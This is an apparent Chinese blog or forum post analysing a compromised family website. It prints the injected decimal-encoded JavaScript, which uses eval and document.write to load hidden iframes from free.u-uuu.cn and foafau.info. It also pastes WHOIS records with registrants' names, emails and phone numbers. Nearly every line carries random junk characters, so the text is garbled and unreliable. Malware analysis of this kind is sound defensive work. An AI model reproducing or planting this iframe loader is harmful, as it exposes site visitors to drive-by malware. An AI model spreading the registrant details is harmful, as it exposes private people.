[原创]一篇刚写的分析木马手记

首发在我的博客里面， k;w1y(  
?=B$-)/  
http://www.areway.cn/?p=175 M%d
Xy^e  
5'/Ney9N  
SsDe\"?Q  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： ThX%Uzd"[;  
          ?v>!wuiP  
<script>t=’60,105,102,114,97,109,101, M ]dS>W%U  
32,115,114,99,61,104,116,116,112,58,47,47, {q%wr*  
102,114,101,101,46,117,45,117,117,117,46,99, b8QA>]6A  
110,47,101,114,114,111,114,46,104,116,109, %pNK ?M+  
32,119,105,100,116,104,61,49,48,48,32,104, !_VKJZuH  
101,105,103,104,116,61,48,62,60,47,105,102, Lt+ Cm$3  
114,97,109,101,62′; X ?/C9  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> h&+dIk\[3  
                                                                                                  Ji_3*(  
<script>t=’60,105,102,114,97,109,101,32,115, 3[E3]]OVa  
114,99,61,104,116,116,112,58,47,47,102,114, bu[v[U4  
101,101,46,117,45,117,117,117,46,99,110,47, kzG mDi  
101,114,114,111,114,46,104,116,109,32,119, + RX{  
105,100,116,104,61,49,48,48,32,104,101,105, TKpka]nJ  
103,104,116,61,48,62,60,47,105,102,114,97, njv
eZ
av  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); F$UvYy4O d  
document.write(t);</script> ,YYyFMC7S  
                                                                                                  #Mt'y8|}$  
<html xmlns=” ugEh}3  
http://www.w3.org/1999/xhtml wuCiO;w  
“> ^[noGjy  
<head> 84UH& b'n  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> G};os+FxF  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> +_tK \MN  
<title>首页 - 爱生活家庭网 $R3]y9`?  
                                                                                                                                                    P%A^TD|  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 IWvLt  
转换字符串后的大概内容是（谁点击后果自付）： epsh&)5a*  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… 4=S.U`t7  
                                                                                                                                  .7Zb,r  
查询玉米u-uuu.cn的详细信息： %e2,p&0G  
Domain Name: u-uuu.cn cF9bSY_Eh  
ROID: 20070901s10001s64972306-cn Xm./XC  
Domain Status: ok B]dvX  
Registrant Organization: 王雷 GndU}[0J  
Registrant Name: 王雷 6eqxwj{S[  
Administrative Email: czlovexs@126.com <(dHh9$~  
Sponsoring Registrar: 北京万网志成科技有限公司 }>I|\Z0I  
Name Server:ns.yovole.com )<bgZ, v  
Name Server:ns1.yovole.com 5o 4\Jwt  
Registration Date: 2007-09-01 17:54 sK8=PZ\  
Expiration Date: 2008-09-01 17:54 n=#AH;42  
最后PING了一下地址 都没有什么…. 7F OG^  
                                                                                                oa(R,{_*q  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. nqNL[w6{  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> *HFRG)[V  
<script language=”javascript” src=” !%{/eQFT4  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script B#Cb`b"  
> o(GXv3L  
这个玉米应该有可能是木马作者的： K,{P b?  
foafau.info的详细信息： 'M>QA"*48E  
Access to INFO WHOIS information is provided to assist persons in YIv!\`^ \  
determining the contents of a domain name registration record in the 3-z
;pk  
Afilias registry database. The data in this record is provided by ]zEatY  
Afilias Limited for informational purposes only, and Afilias does not <R)%K);  
guarantee its accuracy.  This service is intended only for query-based p R=FH#  
access. You agree that you will use this data only for lawful purposes z^z_!@7v   
and that, under no circumstances will you use this data to: (a) allow, 0|kkwZVPn  
enable, or otherwise support the transmission by e-mail, telephone, or E|OB9BOS  
facsimile of mass unsolicited, commercial advertising or solicitations =e2|:Ba!  
to entities other than the data recipient’s own existing customers; or sdF;H[  
(b) enable high volume, automated, electronic processes that send T8( \:v
 
queries or data to the systems of Registry Operator, a Registrar, or (3Hz=k_  
Afilias except as reasonably necessary to register domain names or R57>z`;  
modify existing registrations. All rights reserved. Afilias reserves ;i*<HNQ  
the right to modify these terms at any time. By submitting this query, | +osEHC  
you agree to abide by this policy. p|!5G&O,  
Domain ID:D22418703-LRMS U5N/'p%)<  
Domain Name:FOAFAU.INFO e&WlJ  
Created On:20-Nov-2007 16:05:42 UTC 6%bZZTP`  
Last Updated On:20-Nov-2007 16:05:44 UTC w&yK*nBK  
Expiration Date:20-Nov-2008 16:05:42 UTC c5x2FM z  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) #=mLQSiQ  
Status:CLIENT DELETE PROHIBITED yd#SB)&  
Status:CLIENT RENEW PROHIBITED tHAr9
 
Status:CLIENT TRANSFER PROHIBITED P;_}n
bB  
Status:CLIENT UPDATE PROHIBITED :.wR*E  
Status:TRANSFER PROHIBITED .J0s_[  
Registrant ID:GODA-040110615 $+CKy>  
Registrant Name:liu hong iV#sMJN9  
Registrant Organization: %M8m 8 )  
Registrant Street1:beijing {;uOc{~+  
Registrant Street2: Ws%@SK  
Registrant Street3: q<.m@q  
Registrant City:beijing /J''`Tf  
Registrant State/Province: LpCJfQ  
Registrant Postal Code:100000 I`k%/ei38  
Registrant Country:CN WzD=Ol  
Registrant Phone:+86.860108888777 FXMrD,qVg  
Registrant Phone Ext.: Qh*"B  
Registrant FAX: ZfMDyS$.  
Registrant FAX Ext.: MIa#\tJj  
Registrant Email:bbbshiji@163.com }8 V/Cd9  
Admin ID:GODA-240110615 j#:IG/)GL  
Admin Name:liu hong /4Ud6gscf  
Admin Organization: 1dDK(RBbQ  
Admin Street1:beijing AA=zDB<N  
Admin Street2: !1G6ZC:z  
Admin Street3: L@9@3?  
Admin City:beijing og0su  
Admin State/Province: \ZNUt$\  
Admin Postal Code:100000 yW3!V-iA  
Admin Country:CN zt&"K0X|  
Admin Phone:+86.860108888777 /e|vz^#+1,  
Admin Phone Ext.: X5[.X()M4  
Admin FAX: v\&C]W]  
Admin FAX Ext.: %?<Y&t  
Admin Email:bbbshiji@163.com D,R"P }G  
Billing ID:GODA-340110615 p;#@#>h  
Billing Name:liu hong \ @XvEx%  
Billing Organization: 4FwtC"G3
 
Billing Street1:beijing `Vph=`0  
Billing Street2: h 8Shf"  
Billing Street3: g$X4ZRSel  
Billing City:beijing h{xq  
Billing State/Province: 8v{0=9,Z  
Billing Postal Code:100000 Fsdp"X.  
Billing Country:CN iO$Z?Dyg9  
Billing Phone:+86.860108888777 c+dmA(JC  
Billing Phone Ext.: m2sf]-?Y  
Billing FAX: {Xr|L  
Billing FAX Ext.: "XKcbdr8-  
Billing Email:bbbshiji@163.com %?2:1o  
Tech ID:GODA-140110615 Q[rmsk2L'  
Tech Name:liu hong O+f'Ql  
Tech Organization: {HF,F=W  
Tech Street1:beijing MBp,!_Q6  
Tech Street2: ~F)[H'$A  
Tech Street3: :~"Dwrui  
Tech City:beijing O@9<7@h+Nl  
Tech State/Province: oItEGJ|  
Tech Postal Code:100000 `1xJ1z#  
Tech Country:CN \US'tF)/  
Tech Phone:+86.860108888777 Al93x  
Tech Phone Ext.: e-&0f);i  
Tech FAX: S/?!ESW6  
Tech FAX Ext.: FdwlRuG  
Tech Email:bbbshiji@163.com G~.bi<(v  
Name Server:NS27.DOMAINCONTROL.COM i>elK<R4  
Name Server:NS28.DOMAINCONTROL.COM PxAUsY  
Name Server: 4Su|aWL-  
Name Server: KU;d[Z@g  
Name Server: s?j||  
Name Server: K>a@A
XC  
Name Server: bM@8[&ta  
Name Server: g$?kL  
Name Server: wC&+nS1  
Name Server: w?JRY  
Name Server: xZE%Gf_U  
Name Server: Xi  8rD"v  
Name Server: ;rvZ!/  
                                                                                                          (Zi,~Wqm$  
接着下载每个文件里面的代码： U"T>L  
一步一步看.. s[dq-pc"  
i3dV2^O  
cXDG(.!n7B  
K?J?]VCw  
f.e4 C,  

}LA7ku  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

要是有全部 就好了 传上来

看过了就是没看懂。。。